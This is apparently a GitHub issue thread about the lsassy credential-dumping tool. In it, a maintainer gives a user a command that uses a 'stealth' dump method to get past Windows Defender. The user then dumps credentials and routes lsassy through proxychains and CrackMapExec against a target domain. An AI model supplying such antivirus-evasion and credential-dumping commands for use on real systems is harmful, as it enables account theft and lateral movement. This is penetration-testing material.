Obfuscation-(not a bug)

[maibold1]

First of all Great tool

I got detected by windows defender is there any method that you guys use to bypass it?

i give the tool a try but got flagged by windows defender latest version full patched

[Hackndo]

Hey there!

Try using branch 3.1.2 with

lsassy -u user -p p4ssw0rd -d contoso.local target_ip -m comsvcs_stealth

[maibold1]

Nice it runs now give me an unknown error message at the end but brings the credentials.

can i ask a few things

1. Can the tool run over proxychains ? maybe with ntlmrelay socks?
2. Can the tool run over crackmap exec ?

Thanks and great job with the tool

[Hackndo]

What's your unknown error?

1. It should
2. It does with -M lsassy but it's not the last lsassy version

[maibold1]

Not specify just said

[x] 192.168.0.23 An unknown error has occurred.

but it dump the credentials without any issue.

before try i run other tools over the proxychain like nmap and crackmap exec and they worked . (im very new to proxychain can be on my side thats why i confirm with other tools)

I try to run it with proxychains and i get this error

└─# proxychains lsassy -u admin -p idontknow -d victimdomain.local 10.5.5.10 -e smb -m comsvcs_stealth
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.5.5.10:445 <--denied

Edit 👍

I try with another Kali box and it did work with the proxychains 100% guess something is messed up with my initial box sorre and thanks for the help.

[Hackndo]

Thanks for the details!